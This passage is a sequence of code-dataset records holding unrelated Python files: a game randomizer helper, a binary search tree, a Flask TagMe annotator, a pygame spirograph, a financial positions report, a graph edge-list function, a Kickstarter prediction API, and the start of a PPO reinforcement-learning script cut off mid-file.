self.dungeon_and_cave_island_locations[zone_name]\n        \n        # Special case for Tower of the Gods to use Tower of the Gods Sector when referring to the entrance, not the dungeon\n        if entrance_zone == \"Tower of the Gods\":\n            entrance_zone = \"Tower of the Gods Sector\"\n    else:\n        # Otherwise, for non-dungeon and non-cave locations, just use the zone name.\n        entrance_zone = zone_name\n        \n        # Special case for Tower of the Gods to use Tower of the Gods Sector when referring to the Sunken Treasure\n        if location_name == \"Tower of the Gods - Sunken Treasure\":\n            entrance_zone = \"Tower of the Gods Sector\"\n        # Note that Forsaken Fortress - Sunken Treasure has a similar issue, but there are no randomized entrances on\n        # Forsaken Fortress, so we won't make that distinction here.\n    \n    return entrance_zone\n","sub_path":"randomizers/entrances.py","file_name":"entrances.py","file_ext":"py","file_size_in_byte":30244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"369513582","text":"# bst_2.py is the traditional way of implementing a BST.\r\n    # The put() (and _put()) operation does NOT return a node going back up the call stack. \r\n    # It just keeps calling until it finds the node where node.key == key or where the node is None.\r\n    # When the _put() method is called for a given node, we know ahead of time that that node is NOT None.\r\n    # This makes determining the size of each node (which is necessary for select() and rank() operations) much less efficient (would have to use lazy method).\r\n    # Before using the select and rank operations, you could perform a size operation that takes linear time by going through each node and updating the size of each node.\r\n    # Could use some sort of caching: if the bst.node_count == self.root.size, you don't have to perform the size operation\r\n    # Even with caching, this could result in a really inefficient method if rank() and select() are called frequently and/or interspersed with put() and delete() operations! 
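\r\n    # A possible lazy size refresh, sketched as a comment (assumes the Node/BST classes below; _update_sizes is a hypothetical helper, not part of this file):\r\n    #     def _update_sizes(self, node):\r\n    #         if node is None:\r\n    #             return 0\r\n    #         node.size = 1 + self._update_sizes(node.left) + self._update_sizes(node.right)\r\n    #         return node.size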
\r\n    # When the _get() method is called for a given node, we know ahead of time that the node is NOT None.\r\n\r\n# bst_3.py is the way Sedgewick implements a BST.\r\n    # The put() (and _put()) operation returns a node going back up the call stack.\r\n    # This allows us to easily modify the size parameter of each node going back up the call stack (the eager method takes time proportional to the length of the path).\r\n    # When the _put() method is called for a given node, we do NOT know ahead of time if the node is None.\r\n    # When the _get() method is called for a given node, we do NOT know ahead of time that the node is not None.\r\n    # This method has more carry-over to more complicated BST structures like the red-black tree. \r\n\r\n# python bst_2.py\r\n\r\nclass Node:\r\n    def __init__(self, key, value):\r\n        self.key = key\r\n        self.value = value\r\n        self.size = 1\r\n        self.left = None\r\n        self.right = None\r\n\r\nclass BST:\r\n    def __init__(self):\r\n        self.root = None\r\n        self.nodes = 0\r\n    \r\n    def put(self, key, value):\r\n        if self.root == None:\r\n            self.root = Node(key, value)\r\n            return\r\n        else:\r\n            self._put(self.root, key, value)\r\n    \r\n    \r\n    def _put(self, node, key, value):\r\n        if key==node.key:\r\n            node.value = value\r\n            return\r\n        elif key < node.key:\r\n            if node.left == None:\r\n                node.left = Node(key, value)\r\n                return\r\n            else:\r\n                self._put(node.left, key, value)\r\n        elif key > node.key:\r\n            if node.right == None:\r\n                node.right = Node(key, value)\r\n                return\r\n            else:\r\n                self._put(node.right, key, value)\r\n    \r\n    def get(self, key):\r\n        if self.root == None:\r\n            return None\r\n        else:\r\n            return self._get(self.root, key)\r\n    \r\n    def _get(self, node, key):\r\n        \r\n        if key==node.key:\r\n            return node.value\r\n        elif key < node.key:\r\n            if node.left == None:\r\n                return None\r\n            else:\r\n                return self._get(node.left, key)\r\n        elif key > node.key:\r\n            if node.right == None:\r\n                return None\r\n            else:\r\n                return self._get(node.right, key) \r\n    \r\ndef main():\r\n    bst = BST()\r\n    bst.put('Jim', 22)\r\n    bst.put('Frank', 54)\r\n    bst.put('Billy', 36)\r\n    bst.put('Hank', 87)\r\n    bst.put('Tom', 18)\r\n    bst.put('Xavier', 44)\r\n    bst.put('Ernie', 112)\r\n    bst.put('Sam', 47)\r\n    \r\n    print(bst.get('Hank'))\r\n    \r\n    \r\nif __name__==\"__main__\": main()\r\n    \r\n    \r\n    \r\n    ","sub_path":"chapter_3/st_binarysearchtree/bst_2.py","file_name":"bst_2.py","file_ext":"py","file_size_in_byte":3777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"146282814","text":"from flask import Blueprint, render_template, session\nimport json\nfrom general import TopArtists\nfrom database import db\nimport tagme\n\n\nclass Event(db.Model):\n    __tablename__ = 'event'\n    id = db.Column(db.INTEGER, primary_key=True, autoincrement=True)\n    name = db.Column(db.VARCHAR)\n    info = db.Column(db.VARCHAR)\n    url = db.Column(db.VARCHAR)\n    eventWiki = db.relationship('EventWiki', cascade='all')\n\n    def __repr__(self):\n        return '<Event %r>' % self.id\n\n\nclass EventWiki(db.Model):\n    __tablename__ = 'event_wiki'\n    event_id = db.Column(db.INTEGER, db.ForeignKey('event.id'), primary_key=True)\n    wiki_id = db.Column(db.INTEGER, db.ForeignKey('wiki_content.id'), primary_key=True)\n    wikiContent = db.relationship('WikiContent', cascade='save-update, merge')\n\n    def __repr__(self):\n        return '<EventWiki %r, %r>' % (self.event_id, self.wiki_id)\n\n\nclass WikiContent(db.Model):\n    __tablename__ = 'wiki_content'\n    id = db.Column(db.INTEGER, primary_key=True)\n    title = db.Column(db.VARCHAR)\n\n    def __repr__(self):\n        return 
'<WikiContent %r>' % self.id\n\n\nclass UserTopArtistWikiRecord(db.Model):\n    __tablename__ = 'user_top_artist_wiki_record'\n    user_id = db.Column(db.VARCHAR, db.ForeignKey('user.id'), primary_key=True)\n    annote_wid = db.Column(db.VARCHAR)\n    annote_title = db.Column(db.VARCHAR)\n\n\nspotify_tagme_bp = Blueprint('spotify_tagme_bp', __name__)\n\nkeys_tagme = {\"token\": \"\"}\n\ntry:\n    keys_tagme = json.load(open('keys_tagme.json', 'r'))\nexcept Exception as e:\n    print(e)\n\ntagme.GCUBE_TOKEN = str(keys_tagme[\"token\"])\n\n\n@spotify_tagme_bp.route('/annotate_event')\ndef annotate_event():\n    events = db.session.query(Event).all()\n\n    for event in events:\n        dict_ann = tagme_annotation(event.info)\n\n        try:\n            for ann in dict_ann:\n                wiki_content_obj = WikiContent.query.filter_by(id=ann).first()\n                if wiki_content_obj:\n                    event_wiki_obj = EventWiki(event_id=event.id, wiki_id=ann, wikiContent=wiki_content_obj)\n                    db.session.add(event_wiki_obj)\n                else:\n                    wiki_content = WikiContent(id=int(ann), title=dict_ann[ann])\n                    event_wiki_obj = EventWiki(event_id=event.id, wiki_id=int(ann), wikiContent=wiki_content)\n                    db.session.add(event_wiki_obj)\n            db.session.commit()\n        except Exception as e:\n            print(e)\n\n    return render_template('test.html')\n\n\n@spotify_tagme_bp.route('/annotate_user_top_artist')\ndef annotate_user_top_artist():\n    user_id = session[\"userid\"]\n\n    user_top_artist_wiki_record = UserTopArtistWikiRecord.query.filter_by(user_id=user_id).first()\n\n    if not user_top_artist_wiki_record:\n        top_artists = db.session.query(TopArtists).filter_by(user_id=user_id).group_by(TopArtists.artist_id).all()\n\n        l_artist = []\n\n        for artist in top_artists:\n            l_artist.append(artist.artist.name)\n\n        str_artist = \", \".join(l_artist)\n\n        try:\n            dict_ann = tagme_annotation(str_artist)\n\n            if len(dict_ann) != 0:\n                user_top_artist_wiki_record = UserTopArtistWikiRecord(user_id=user_id,\n                                                                      annote_wid=\";\".join(list(dict_ann)),\n                                                                      annote_title=\";\".join(list(dict_ann.values())))\n                db.session.add(user_top_artist_wiki_record)\n                db.session.commit()\n\n        except Exception as e:\n            print(e)\n\n    return render_template(\"test.html\")\n\n\ndef tagme_rel(wid_pairs):\n    rels = tagme.relatedness_title(wid_pairs)\n\n    return rels.relatedness\n\n\ndef tagme_annotation(text_to_annotate):\n    event = tagme.annotate(text_to_annotate)\n\n    dict_ann = {}\n\n    # Print annotations with a score higher than 0.3\n    for ann in event.get_annotations(0.3):\n        dict_ann[str(ann.entity_id)] = ann.entity_title\n\n    return dict_ann\n\n","sub_path":"text_analyze/spotify_tagme.py","file_name":"spotify_tagme.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"61913148","text":"#Author: Daniel Cordova Bermudez\n#Group 02\n#Description: A series of functions that draw geometric figures.\n\nimport pygame # pygame library\nimport math #Python math library\nimport random #random color components for color()\n\n# Screen dimensions\nANCHO = 800\nALTO = 800\n# Colors\nBLANCO = (255, 255, 255) # R,G,B in the range [0,255], 0 absence of color, 255 full intensity\n\n\n#Creates random colors.\ndef color():\n    return random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)\n\n\n#Draws the first figure.\ndef figura1(ventana):\n\n\n    l = 2\n    radioMenor = 50\n    radioMayor = 140\n    k = radioMenor / radioMayor\n    r = radioMenor // math.gcd(radioMenor, radioMayor)\n\n    for angulo in range(0, 360 * r + 1):\n        a = math.radians(angulo)\n        x = int(radioMayor * ((1 - k) * math.cos(a) + l * k * math.cos((1 - k) * a / 
k)))\n        y = int(radioMayor * ((1 - k) * math.sin(a) - l * k * math.sin((1 - k) * a / k)))\n        pygame.draw.circle(ventana, color(), (x + ANCHO // 2, ALTO // 2 - y), 1)\n\n\n#Draws the second figure.\ndef figura2(ventana):\n\n\n    l = .8\n    radioMenor = 70\n    radioMayor = 300\n    k = radioMenor / radioMayor\n    r = radioMenor // math.gcd(radioMenor, radioMayor)\n\n    for angulo in range(0, 360 * r + 1):\n        a = math.radians(angulo)\n        x = int(radioMayor * ((1 - k) * math.cos(a) + l * k * math.cos((1 - k) * a / k)))\n        y = int(radioMayor * ((1 - k) * math.sin(a) - l * k * math.sin((1 - k) * a / k)))\n        pygame.draw.circle(ventana, color(), (x + ANCHO // 2, ALTO // 2 - y), 1)\n\n\n#Draws the third figure.\ndef figura3(ventana):\n\n    l = .6\n    radioMenor = 5\n    radioMayor = 150\n    k = radioMenor / radioMayor\n    r = radioMenor // math.gcd(radioMenor, radioMayor)\n\n    for angulo in range(0, 360 * r + 1):\n        a = math.radians(angulo)\n        x = int(radioMayor * ((1 - k) * math.cos(a) + l * k * math.cos((1 - k) * a / k)))\n        y = int(radioMayor * ((1 - k) * math.sin(a) - l * k * math.sin((1 - k) * a / k)))\n        pygame.draw.circle(ventana, color(), (x + ANCHO // 2, ALTO // 2 - y), 1)\n\n\n#Draws the fourth figure.\ndef figura4(ventana):\n\n    l = .6\n    radioMenor = 70\n    radioMayor = 400\n    k = radioMenor / radioMayor\n    r = radioMenor // math.gcd(radioMenor, radioMayor)\n\n    for angulo in range(0, 360 * r + 1):\n        a = math.radians(angulo)\n        x = int(radioMayor * ((1 - k) * math.cos(a) + l * k * math.cos((1 - k) * a / k)))\n        y = int(radioMayor * ((1 - k) * math.sin(a) - l * k * math.sin((1 - k) * a / k)))\n        pygame.draw.circle(ventana, color(), (x + ANCHO // 2, ALTO // 2 - y), 1)\n\n#Draws the fifth figure.\ndef figura5(ventana):\n\n    l = 7\n    radioMenor = 40\n    radioMayor = 100\n    k = radioMenor / radioMayor\n    r = radioMenor // math.gcd(radioMenor, radioMayor)\n\n    for angulo in range(0, 360 * r + 1):\n        a = math.radians(angulo)\n        x = int(radioMayor * ((1 - k) * math.cos(a) + l * k * math.cos((1 - k) * a / k)))\n        y = int(radioMayor * ((1 - k) * math.sin(a) - l * k * math.sin((1 - k) * a / k)))\n        pygame.draw.circle(ventana, color(), (x + ANCHO // 2, ALTO // 2 - y), 1)\n\n\n#Starts Pygame and calls the functions that draw the figures.\ndef dibujarEspirografo():\n\n    # Basic structure of a program that uses pygame to draw\n    # Initializes the pygame engine\n    pygame.init()\n    # Creates an ANCHO x ALTO window\n    ventana = pygame.display.set_mode((ANCHO, ALTO)) # Creates the window where it will draw\n    reloj = pygame.time.Clock() # To cap the fps\n    termina = False # Flag that tells us whether execution should end; we start by assuming it should not\n\n    while not termina: # Main loop: WHILE the variable termina is False, the loop repeats automatically\n        # Processes incoming events\n        for evento in pygame.event.get():\n            if evento.type == pygame.QUIT: # The user clicked the close button\n                termina = True # We want to end the loop\n\n        # Clear the screen\n        ventana.fill(BLANCO)\n\n        # Draw: here you make all the strokes you need\n        # Normally you call another function and pass -ventana- as a parameter, for example, dibujarLineas(ventana)\n        # See https://www.pygame.org/docs/ref/draw.html for what draw can do\n\n        figura1(ventana)\n        figura2(ventana)\n        figura3(ventana)\n        figura4(ventana)\n        figura5(ventana)\n\n        pygame.display.flip() # Updates the drawing (if you don't call this function, nothing is drawn)\n        reloj.tick(40) # 40 fps\n\n    # After the main loop\n    pygame.quit() # shuts down pygame\n\n\n#The main function calls the 
function that starts pygame and draws the figures.\ndef main():\n    dibujarEspirografo()\n\n#Calls the main function.\nmain()","sub_path":"Mision_6.py","file_name":"Mision_6.py","file_ext":"py","file_size_in_byte":4872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"512296619","text":"\"\"\"\n-------------------------------------------------------------------------------\nMODULE\n    safex_positions\n\nDESCRIPTION\n    Date                : 2014-04-07\n    Purpose             : This module contains an implementation of generating\n                          safex positions report.\n    Department and Desk : Risk Mid\n    Requester           : Patrick Ngoie\n    Developer           : Jakub Tomaga\n    CR Number           : CHNG0001865852\n\nHISTORY\n===============================================================================\nDate       CR number     Developer        Description\n-------------------------------------------------------------------------------\n24-04-2014 1919888       Jakub Tomaga     Quote marks around non-numeric\n                                          values removed, ClosingAIP column\n                                          added back - both modifications\n                                          in the previous version of the\n                                          script caused failures during\n                                          subsequent Intellimatch feed.\n-------------------------------------------------------------------------------\n\"\"\"\n\nimport acm\nfrom at_ael_variables import AelVariableHandler\nimport at_report\n\n\nclass PositionsReport(at_report.CSVReportCreator):\n    \"\"\"Creates the report.\"\"\"\n    def __init__(self, name, suffix, path, trade_filter, start_date, end_date):\n        super(PositionsReport, self).__init__(file_name=name,\n            file_suffix=suffix, path=path,\n            csv_writer_parameters={'delimiter': ','}) # No quote marks!\n\n        self.trade_filter = trade_filter\n        self.start_date = start_date\n        self.end_date = end_date\n\n    def _collect_data(self):\n        \"\"\"Collect all required data relevant for the report.\"\"\"\n        self._log('Started')\n\n        calc_space = acm.Calculations().CreateCalculationSpace(\n            acm.GetDefaultContext(), 'FPortfolioSheet')\n\n        trade_selection = acm.FTradeSelection[self.trade_filter]\n        top_node = calc_space.InsertItem(trade_selection)\n\n        grouper = acm.FStoredPortfolioGrouper.Select(\n            'name=Portfolio')[0].Grouper()\n        top_node.ApplyGrouper(grouper)\n\n        # Portfolio sheet settings (variables)\n        pnl_start_date_var = 'Standard Calculations Profit And Loss Start Date'\n        pnl_end_date_var = 'Standard Calculations Profit And Loss End Date'\n        valuation_date_var = 'Valuation Date'\n\n        calc_space.SimulateGlobalValue(pnl_start_date_var, self.start_date)\n        calc_space.SimulateGlobalValue(pnl_end_date_var, self.end_date)\n        calc_space.SimulateGlobalValue(valuation_date_var, self.end_date)\n\n        calc_space.Refresh()\n\n        # Extract data\n        if top_node.NumberOfChildren():\n            # Iterate over a node tree structure in the calculation sheet\n            # Note: Iterators need to be cloned - otherwise deeper levels won't\n            # be handled properly!\n            portfolio_iter = top_node.Iterator().Clone().FirstChild()\n            while portfolio_iter:\n                count = 1\n                number_of_children = portfolio_iter.Tree().NumberOfChildren()\n                ins_iter = portfolio_iter.Clone().FirstChild()\n                portfolio_name = portfolio_iter.Tree().Item().StringKey()\n                while ins_iter:\n                    self._log('Processing {0}/{1} ({2})'.format(count,\n                        number_of_children, portfolio_name))\n                    count += 1\n                    self.content.append(self._line(calc_space, ins_iter,\n                        portfolio_name))\n                    ins_iter = ins_iter.NextSibling()\n                portfolio_iter = portfolio_iter.NextSibling()\n\n        # Remove simulations\n        calc_space.RemoveGlobalSimulation(pnl_start_date_var)\n        calc_space.RemoveGlobalSimulation(pnl_end_date_var)\n        
calc_space.RemoveGlobalSimulation(valuation_date_var)\n\n self._log('Finished')\n\n def _line(self, calc_space, iterator, portfolio_name):\n \"\"\"Return a line to be appended to the csv file.\n\n iterator.Item() should return object of FInstrumentAndTrades\n \"\"\"\n\n # Input values\n period_start = self.start_date\n period_end = self.end_date\n\n # Directly extracted values from data structures\n ins = iterator.Tree().Item().Instruments()[0]\n ins_name = ins.Name()\n currency = ins.Currency().Name()\n contract_size = ins.ContractSize()\n ins_type = ins.InsType()\n expiry = ins.ExpiryDate()\n quote_type = ins.QuoteType()\n quotation_factor = ins.Quotation().QuotationFactor()\n\n if ins.InsType() == 'Option':\n ins_option_type = 'Call' if ins.IsCallOption() else 'Put'\n ins_strike_price = ins.StrikePrice()\n else:\n # Not applicable when instrument's type is other than option.\n ins_option_type = ins_strike_price = ''\n\n # Directly extracted vales for underlying instrument (if any)\n u_ins = ins.Underlying()\n if u_ins:\n u_contract_size = u_ins.ContractSize()\n u_ins_name = u_ins.Name()\n u_ins_type = u_ins.InsType()\n\n # Normalised instrument name\n u_normalised_ins = self._normalised_instrument_name(u_ins)\n\n else:\n # Not applicable when underlying instrument doesn't exist\n u_contract_size = u_ins_name = u_ins_type = u_normalised_ins = ''\n\n # Values from calculation space\n value_start = self._str_to_float(\n calc_space.CreateCalculation(iterator.Tree(),\n 'Portfolio Value Start').FormattedValue())\n\n value_end = self._str_to_float(\n calc_space.CreateCalculation(iterator.Tree(),\n 'Portfolio Value End').FormattedValue())\n\n used_price_start = self._str_to_float(\n calc_space.CreateCalculation(iterator.Tree(),\n 'Portfolio Profit Loss Price Start Date').FormattedValue())\n\n used_price_end = self._str_to_float(\n calc_space.CreateCalculation(iterator.Tree(),\n 'Portfolio Profit Loss Price End Date').FormattedValue())\n\n pl_position_start = self._str_to_float(\n calc_space.CreateCalculation(iterator.Tree(),\n 'Portfolio Profit Loss Position Start').FormattedValue())\n\n pl_position_end = self._str_to_float(\n calc_space.CreateCalculation(iterator.Tree(),\n 'Portfolio Profit Loss Position End').FormattedValue())\n\n total_pl = self._str_to_float(\n calc_space.CreateCalculation(iterator.Tree(),\n 'Portfolio Total Profit and Loss').FormattedValue())\n\n total_pl_daily = self._str_to_float(\n calc_space.CreateCalculation(iterator.Tree(),\n 'Portfolio Total Profit and Loss Daily').FormattedValue())\n\n # Dependent values\n if ins_type == 'Future/Forward' and quote_type == 'Per Contract':\n normalised_used_price_start = (used_price_start *\n quotation_factor / contract_size)\n normalised_used_price_end = (used_price_end *\n quotation_factor / contract_size)\n else:\n normalised_used_price_start = pl_position_start * quotation_factor\n normalised_used_price_end = pl_position_end * quotation_factor\n\n if ins_option_type:\n opening_front_notional = (pl_position_start *\n normalised_used_price_start)\n closing_front_notional = (pl_position_end *\n normalised_used_price_end)\n else:\n opening_front_notional = (pl_position_start *\n normalised_used_price_start * contract_size)\n closing_front_notional = (pl_position_end *\n normalised_used_price_end * contract_size)\n \n portfolio_nbr = ''\n physical_port = acm.FPhysicalPortfolio[portfolio_name]\n if physical_port:\n portfolio_nbr = physical_port.Oid()\n\n # Once the report is generated, it is used for feed into Intellimatch\n # which 
depends on column positioning. That's why the column needs to\n # stay in it's original position. Default value 0 - no specification.\n closing_aip = 0\n\n # Construct output line out of extracted data\n line = (\n portfolio_name,\n portfolio_nbr,\n u_contract_size,\n ins_name,\n value_start,\n value_end,\n currency,\n pl_position_end,\n contract_size,\n period_start,\n period_end,\n total_pl,\n used_price_start,\n used_price_end,\n ins_type,\n u_ins_name,\n u_ins_type,\n ins_option_type,\n ins_strike_price,\n expiry,\n quote_type,\n closing_aip,\n total_pl_daily,\n pl_position_start,\n quotation_factor,\n u_normalised_ins,\n normalised_used_price_start,\n normalised_used_price_end,\n opening_front_notional,\n closing_front_notional\n )\n\n return line\n\n @staticmethod\n def _normalised_instrument_name(instrument):\n \"\"\"Return normalised instrument name.\"\"\"\n name = instrument.Name()\n\n if name.lower().startswith('zar/'):\n if instrument.InsType() in ('Commodity', 'Future/Forward'):\n name = name.split('/')[1]\n elif instrument.InsType() == 'EquityIndex':\n if name.lower().__contains__('_divfut_underlying'):\n name = name.split('/', 1)[1]\n else:\n name = name.split('/', 1)[1].split('_')[0]\n elif instrument.InsType() in ('Stock', 'ETF'):\n name = name.split('/', 1)[1].split('_')[0]\n\n return name\n\n @staticmethod\n def _str_to_float(val):\n \"\"\"\n Convert string to float while ignoring the commas\n within the number.\n \"\"\"\n if type(val) == float:\n return val\n else:\n try:\n return float(val.replace(',', '')) if val != '' else 0\n except ValueError:\n return 0\n\n def _header(self):\n \"\"\"Return columns of the header.\"\"\"\n header = [\n 'Portfolio',\n 'PortfolioID',\n 'Underlying.ContractSize',\n 'Instrument',\n 'Val Start',\n 'Val End',\n 'Currency',\n 'PLPosEnd',\n 'Contract Size',\n 'Period Start',\n 'Period End',\n 'TPL',\n 'Used Price Start',\n 'Used Price End',\n 'InstrumentType',\n 'UnderlyingInstrument',\n 'UnderlyingInstruentType',\n 'Call/Put',\n 'Strike Price',\n 'Expiry',\n 'QuoteType',\n 'ClosingAIP',\n 'TPLD',\n 'PLPosStart',\n 'QuotationFactor',\n 'NormalisedUnderlyingInstrument',\n 'NormalisedUsedPriceStart',\n 'NormalisedUsedPriceEnd',\n 'OpeningFrontNotional',\n 'ClosingFrontNotional'\n ]\n\n return header\n\n @staticmethod\n def _log(message):\n \"\"\"Basic console logging with time stamp prefix.\"\"\"\n print(\"{0}: {1}\".format(acm.Time.TimeNow(), message))\n\n\n_CALENDAR = acm.FCalendar['ZAR Johannesburg']\nTODAY = acm.Time().DateToday()\nPREVIOUS_BUSINESS_DAY = _CALENDAR.AdjustBankingDays(TODAY, -1)\n\nSTART_DATE_DICT = {\n 'Previous Business Day': PREVIOUS_BUSINESS_DAY,\n 'Custom Date': PREVIOUS_BUSINESS_DAY\n}\nSTART_DATE_KEYS = START_DATE_DICT.keys()\nSTART_DATE_KEYS.sort()\n\nEND_DATE_DICT = {\n 'Today': TODAY,\n 'Custom Date': TODAY\n}\nEND_DATE_KEYS = END_DATE_DICT.keys()\nEND_DATE_KEYS.sort()\n\n\ndef custom_start_date_hook(selected_variable):\n \"\"\"Enable/Disable Custom Start Date based on Start Date value.\"\"\"\n start_date_custom = selected_variable.handler.get('start_date_custom')\n\n if selected_variable.value == 'Custom Date':\n start_date_custom.enabled = True\n else:\n start_date_custom.enabled = False\n\n\ndef custom_end_date_hook(selected_variable):\n \"\"\"Enable/Disable Custom End Date based on End Date value.\"\"\"\n end_date_custom = selected_variable.handler.get('end_date_custom')\n\n if selected_variable.value == 'Custom Date':\n end_date_custom.enabled = True\n else:\n end_date_custom.enabled = False\n\n\nael_variables 
ael_variables = AelVariableHandler()\nael_variables.add('trade_filter', label='Trade filter',\n    default='SI_safex_futures', alt='Trade filter')\n\nael_variables.add('filename', label='Filename',\n    default='FrontArena_Safex_Positions', alt='Filename')\n\nael_variables.add('path', label='Path', default=r'F:/', alt='Path')\n\nael_variables.add('start_date', label='Start Date',\n    default='Previous Business Day', collection=START_DATE_KEYS,\n    alt='Start date', hook=custom_start_date_hook)\n\nael_variables.add('start_date_custom', label='Start Date Custom',\n    default=PREVIOUS_BUSINESS_DAY, alt='Custom start date', enabled=False)\n\nael_variables.add('end_date', label='End Date',\n    default='Today', collection=END_DATE_KEYS,\n    alt='End date', hook=custom_end_date_hook)\n\nael_variables.add('end_date_custom', label='End Date Custom',\n    default=TODAY, alt='Custom end date', enabled=False)\n\n\ndef ael_main(config):\n    \"\"\"The main entry point of the Run Script window.\"\"\"\n    # Get start date\n    if config['start_date'] == 'Custom Date':\n        start_date = config['start_date_custom']\n    else:\n        start_date = START_DATE_DICT[config['start_date']]\n\n    # Get end date\n    if config['end_date'] == 'Custom Date':\n        end_date = config['end_date_custom']\n    else:\n        end_date = END_DATE_DICT[config['end_date']]\n\n    # Generate the report\n    report = PositionsReport(name=config['filename'], suffix='csv',\n        path=config['path'], trade_filter=config['trade_filter'],\n        start_date=start_date, end_date=end_date)\n    report.create_report()\n","sub_path":"Python modules/safex_positions.py","file_name":"safex_positions.py","file_ext":"py","file_size_in_byte":14168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"632924393","text":"\ndef make_edge_list(adjacency):\n    \"\"\" This function creates an edge-list representation of a graph from the supplied adjacency matrix.\n    \"\"\"\n    # Start with an empty edge_list\n    edge_list = []\n\n    # Map each non-zero column index i to the vertex label chr(65 + i) ('A', 'B', ...)\n    for row in adjacency:\n        lst = []\n        for i, item in enumerate(row):\n            if item != 0:\n                lst.append(chr(65 + i))\n        edge_list.append(lst)\n\n    return edge_list","sub_path":"year2_1819/computer_programming_3_algorithms_data_structures/2019_01_26_16_02_32_255813_organised/w10_graph_algorithms/adjacency_matrix_to_an_edge_list.py","file_name":"adjacency_matrix_to_an_edge_list.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"176102163","text":"import joblib\nimport numpy as np\nfrom flask import Flask, request, jsonify\nimport pandas as pd\n\ndata = pd.read_csv(\"data/ks-projects-201801.csv\")\ncategory_options = data['main_category'].unique().tolist()\ncountry_options = data['country'].unique().tolist()\ncurrency_options = data['currency'].unique().tolist()\n\n# Load the trained classifier and the fitted encoders/scalers for the features\nmodel = joblib.load('models/kickstarter_classifier.joblib')\nencoder = joblib.load('models/kickstarter_encoder.joblib')\ngoal_scaler = joblib.load('models/kickstarter_goal_scaler.joblib')\nbackers_scaler = joblib.load('models/kickstarter_backers_scaler.joblib')\nduration_scaler = joblib.load('models/kickstarter_duration_scaler.joblib')\n\napp = Flask(__name__)\n\n# Example request:\n# {\n#     \"category\": \"Poetry\",\n#     \"main_category\": \"Publishing\",\n#     \"currency\": \"GBP\",\n#     \"goal\": 1000.0,\n#     \"country\": \"GB\",\n#     \"duration_days\": 58,\n#     \"backers\": 300\n# }\n
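# A minimal usage sketch (hedged assumption: the app is served on Flask's\n# default http://localhost:5000):\n#   curl -X POST http://localhost:5000/predict \\\n#        -H \"Content-Type: application/json\" \\\n#        -d '{\"category\": \"Poetry\", \"main_category\": \"Publishing\", \"currency\": \"GBP\", \"goal\": 1000.0, \"country\": \"GB\", \"duration_days\": 58, \"backers\": 300}'\n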
@app.route('/predict', methods=['GET', 'POST'])\ndef predict():\n    content = request.get_json()\n    # scikit-learn scalers expect a 2-D array, so wrap each scalar in [[...]]\n    # and unwrap the scalar result afterwards (np.ndarray(x) takes a *shape*,\n    # not data, so np.array-style input is required here)\n    content['goal'] = float(goal_scaler.transform([[content['goal']]])[0][0])\n    content['backers'] = float(backers_scaler.transform([[content['backers']]])[0][0])\n    content['duration_days'] = float(duration_scaler.transform([[content['duration_days']]])[0][0])\n    encoded = encoder.transform([content])\n    result = model.predict_proba(encoded)\n    return jsonify({\n        'success': result[0][1],\n        'failed': result[0][0]\n    })\n\n@app.route('/categories', methods=['GET'])\ndef getCategoryOptions():\n    return jsonify(category_options)\n\n@app.route('/countries', methods=['GET'])\ndef getCountryOptions():\n    return jsonify(country_options)\n\n@app.route('/currencies', methods=['GET'])\ndef getCurrencyOptions():\n    return jsonify(currency_options)\n\nif __name__ == '__main__':\n    app.run()","sub_path":"trabalho_final_inferencia.py","file_name":"trabalho_final_inferencia.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"455600056","text":"import numpy as np\nimport gym\nfrom tensorboardX import SummaryWriter\nimport threading\n\nimport time\nimport datetime\nfrom collections import namedtuple\nfrom collections import deque\nimport math\nimport os\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.nn.utils.clip_grad import clip_grad_norm_\n\n\n# https://github.com/andri27-ts/Reinforcement-Learning/blob/master/Week5/PPO.py\n\n\nclass ConvProcess(nn.Module):\n    def __init__(self, input_shape, out_size, device):\n        super(ConvProcess, self).__init__()\n\n        self.conv = nn.Sequential(\n            nn.Conv2d(3, 16, kernel_size=8, stride=4),\n            nn.BatchNorm2d(16),\n            nn.ReLU(),\n            nn.Conv2d(16, 32, kernel_size=4, stride=2),\n            nn.BatchNorm2d(32),\n            nn.ReLU(),\n            nn.Conv2d(32, 64, kernel_size=3, stride=1),\n            nn.BatchNorm2d(64),\n            nn.ReLU()\n        )\n\n        self.device = device\n\n    def prep(self, state):\n        # HWC uint8 observation -> 1x3xHxW float tensor\n        state = torch.tensor(np.array([state])).float().to(self.device)\n        state = state.permute(0, 3, 1, 2)\n        return state\n\n    def forward(self, state):\n        state = self.prep(state)\n        return torch.flatten(self.conv(state))\n\n    def _get_conv_out(self, net, shape):\n        o = net(torch.zeros(3, *shape))  # apply convolution layers..\n        return int(np.prod(o.size()))  # ..to obtain the output shape\n\n\nclass A2C_policy(nn.Module):\n    '''\n    Policy (actor) neural network\n    '''\n\n    def __init__(self, input_features, n_actions, hidden_size, out_size):\n        super(A2C_policy, self).__init__()\n\n        self.lp = nn.Sequential(\n            nn.Linear(input_features, hidden_size),\n            nn.ReLU(),\n            nn.Linear(hidden_size, hidden_size),\n            nn.ReLU()\n        )\n\n        self.mean_1 = nn.Linear(hidden_size, n_actions)\n        self.mean_1.weight.data.mul_(0.1)\n\n        self.logstd = nn.Parameter(torch.zeros(n_actions))\n\n    def forward(self, x):\n        ot_n = self.lp(x)\n        return torch.tanh(self.mean_1(ot_n))\n\n\nclass A2C_value(nn.Module):\n    '''\n    Value (critic) network\n    '''\n\n    def __init__(self, input_features, hidden_size):\n        super(A2C_value, self).__init__()\n\n        self.lp = nn.Sequential(\n            nn.Linear(input_features, hidden_size),\n            nn.ReLU(),\n            nn.Linear(hidden_size, hidden_size),\n            nn.ReLU(),\n            nn.Linear(hidden_size, 1)\n        )\n\n    def forward(self, x):\n        return 